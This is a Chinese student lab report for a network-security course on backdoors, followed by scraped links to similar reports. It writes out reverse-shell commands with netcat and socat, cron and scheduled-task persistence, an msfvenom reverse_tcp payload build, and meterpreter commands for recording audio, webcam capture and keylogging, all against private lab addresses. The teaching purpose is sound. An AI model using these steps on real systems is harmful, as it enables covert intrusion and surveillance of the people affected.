实验预习
- 后门: 指绕过安全控制而获取对程序或系统访问权的方法。最主要目的就是方便以后再次秘密进入或者控制系统。
-
木马与后门的区别:
- 木马:通过欺骗用户的方法(包含捆绑,利用网页等)让用户不知不觉的安装到系统中的一类软件,主要功能有远程控制,盗密码等,具有欺骗性。
- 区别:后门和木马的区别就是它更注重隐蔽性但是没有欺骗性,因此它的危害性没有木马大。
实验内容
常用后门工具
ncat: netcat能通过TCP和UDP在网络中读写数据,通过与其他工具结合和重定向。
-
端口扫描:
-
Win获得Linux Shell
a. 在win下查看IP地址
b. 使用ncat.exe程序监听本机的5229端口
c. 在Kali下,使用
nc -e
命令反弹连接Win的5229端口d. win下获得一个linux shell,可运行任何指令,如ls
-
Linux获得Win Shell
a. 查看kali的IP
b. kali中使用nc指令监听5229端口
c. 在Win下,使用
ncat.exe -e
命令选项反弹连接Kali主机的5229端口d. kali下看到Win的命令提示
-
-
数据传输:
- Win下监听5229端口
- Kali下连接到Win的5229端口
- Win下监听5229端口
-
文件传输:
- 在win中打开监听,在kali中发送文件
- 在win中打开监听,在kali中发送文件
Meterpreter
1.使用netcat获取主机操作Shell,cron启动
crontab: 用来让使用者在固定时间或固定间隔执行程序的指令。
参数:
-e [UserName]: 执行文字编辑器来设定时程表,内定的文字编辑器是 VI,如果你想用别的文字编辑器,则请先设定 VISUAL 环境变数来指定使用那个文字编辑器(比如说 setenv VISUAL joe)
-r [UserName]: 删除目前的时程表
-l [UserName]: 列出目前的时程表
-v [UserName]:列出用户cron作业的状态
Win下,监听5229端口
crontab -e
指令编辑定时任务在最后一行添加
&& * * * * /bin/netcat 192.168.126.129 5229 -e /bin/sh
,意思是在每个小时的第&&分钟反向连接Win主机的5229端口当时间到了&&时,此时已经获得了Kali的shell
2.使用socat获取主机操作Shell, 任务计划启动
socat: 可以看做netcat的加强版。
-
Win->控制面板->管理工具->任务计划程序
-
新建任务计划
1 .触发器:
当锁定任何用户的工作站时
2 .操作->程序或脚本:
c:\ncat\ncat.exe
3 .操作->添加参数:
tcp-listen:5229 exec:cmd.exe,pty,stderr
将cmd.exe绑定到端口5229,同时把cmd.exe的stderr重定
向到stdout上4 .运行新建的任务
5 .在Kali环境下输入指令
socat - tcp:192.168.126.129:5229
,此时已经成功获得了一个cmd shell
-
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 创建后门文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.128 LPORT=5229 -f exe > 20155229_backdoor.exe
- nc指令将后门程序传送到Win:
- Kali中使用
msfconsole
指令进入msf控制台,打开监听进程,设置payload,设置反弹回连的IP和端口:
其实我没太懂为什么输入msfconsole
命令后会出现类似下图《小马宝丽》动画片里的生物,可能是设计者有一颗少女心(童心)吧。。。囧
- 进行监听
- 运行win中的后门程序
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic指令可以截获一段音频
webcam_snap指令可以使用摄像头进行拍照
screenshot指令可以进行截屏:
keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
基础问题问答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 后门在软件开发过程中被引入,发布室被忽视,在下载该软件时,自动的被安装在主机中。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- win:新建任务触发器
- linux:cron定时触发
(3)Meterpreter有哪些给你映像深刻的功能?
- 能够捕获音频,利用摄像头拍照等一些列能够获取我们隐私的操作。(可以说是日常恐慌了。。。)
(4)如何发现自己有系统有没有被安装后门?
- 可以使用一些杀毒软件对主机进行查杀;对防火墙、端口等设施进行检查。
实验中遇到的问题及解决
问题一:输入webcam_snap之后出现以下错误提示
想起自己使用的是虚拟机win7进行的实验,所以在win7中设备查找是否有图像设备,答案是没有。然后将电脑上的摄像头连接到虚拟机中。再次执行webcam_snap该命令,虚拟机能够进行拍照。
实验总结与体会
本次实验在开始做之前先了解了一些相关的知识,看起来有些枯燥,但开始动手做实验后,发现了本次实验的魅力,尤其是看到了“小马宝丽”还有录音、拍照、读取击键的记录等结果后,但也觉得能够看到别人在做什么,反想到我们现在在电脑上的一举一动可能也被别人监视着就很恐慌。所以这次实验也给我提了一个很大的醒,哪怕是百度过关的软件,那也不能下载,因为不知道那上面会不会有隐藏的后门、木马等附在软件中。
20155229《网络对抗技术》Exp2:后门原理与实践的更多相关文章
-
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
-
20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
-
20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
-
20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
-
20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
-
20145236《网络对抗》Exp2 后门原理与实践
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...
-
20155202 张旭《网络对抗》Exp2 后门原理与实践
20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...
-
20155218《网络对抗》Exp2 后门原理与实践
20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...
-
20155227《网络对抗》Exp2 后门原理与实践
20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...
-
20155232《网络对抗》Exp2 后门原理与实践
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...
随机推荐
-
caffe添加自己的层
首先修改src/caffe/proto/下的caffe.proto,修改好后需要编译 然后修改include/caffe/layers/logwxl_layer.hpp 然后修改src/caffe/l ...
-
js 中的快速排序算法简单实现
对于快速排序,最早是在c++中看到,它是利用指针来交换顺序,其实无论哪种语言,原理 和 思想都是一样,然而真正用起来的时候就特别容易忽略一些事实,导致实现失败.废话少说,下面用js实现一下快速排序: ...
-
C#上传图片
//一般处理程序 public void GetImageFromWeb() { //创建文件夹 //2016-10-14 dq string filePath = "~/ProductIm ...
-
[译]学习IPython进行交互式计算和数据可视化(三)
第二章 在本章中,我们将详细学习IPython相对以Python控制台带来的多种改进.特别的,我们将会进行下面的几个任务: 从IPython中使用系统shell以在shell和Python之间进行强大 ...
-
[转载]ExtJs4 笔记(12) Ext.toolbar.Toolbar 工具栏、Ext.toolbar.Paging 分页栏、Ext.ux.statusbar.StatusBar 状态栏
作者:李盼(Lipan)出处:[Lipan] (http://www.cnblogs.com/lipan/)版权声明:本文的版权归作者与博客园共有.转载时须注明本文的详细链接,否则作者将保留追究其法律 ...
-
Sublime Text 3开启自动换行
在Submine Text 3中要开启自动换行功能只需要两个步骤: 1.找到查看(View) 2.点击弹出菜单中的自动换行即可 但是如果是在2中的话就相对麻烦少少,现在也说下其开启自动换行功能的步骤: ...
-
Go语言参数中的三个点是干什么的
Go语言函数中有三个点...表示为可变参数,可以接受任意个数的参数. 示例代码: package main import "fmt" func Greeting(prefix st ...
-
8款唯美设计的HTML5/CSS3应用
1.CSS3漂亮的自定义Checkbox复选框 9款迷人样式 今天我们来分享一款9款样式迷人的CSS3漂亮的自定义Checkbox复选框.这几款复选框样式很丰富,使用起来也比较方便. 在线演示 源码下 ...
-
Oracle EBS-SQL (OM-3):销售连接停靠站时冲减库存出错处理.sql
DELETE FROM INV.MTL_RESERVATIONS MRWHERE EXISTS (SELECT 1 FROM WSH.WSH_DELIVERY_ASSIGNMENTS WDA ...
-
ATA接口寄存器描述
ATA接口寄存器描述 .ATA接口的三种数据传输方式 位. )MDMA(Multiword DMA)传输,用于数据传输.ATA主机控制器向ATA设备下达MDMA传输命令后,等待设备向主机发送DMARQ ...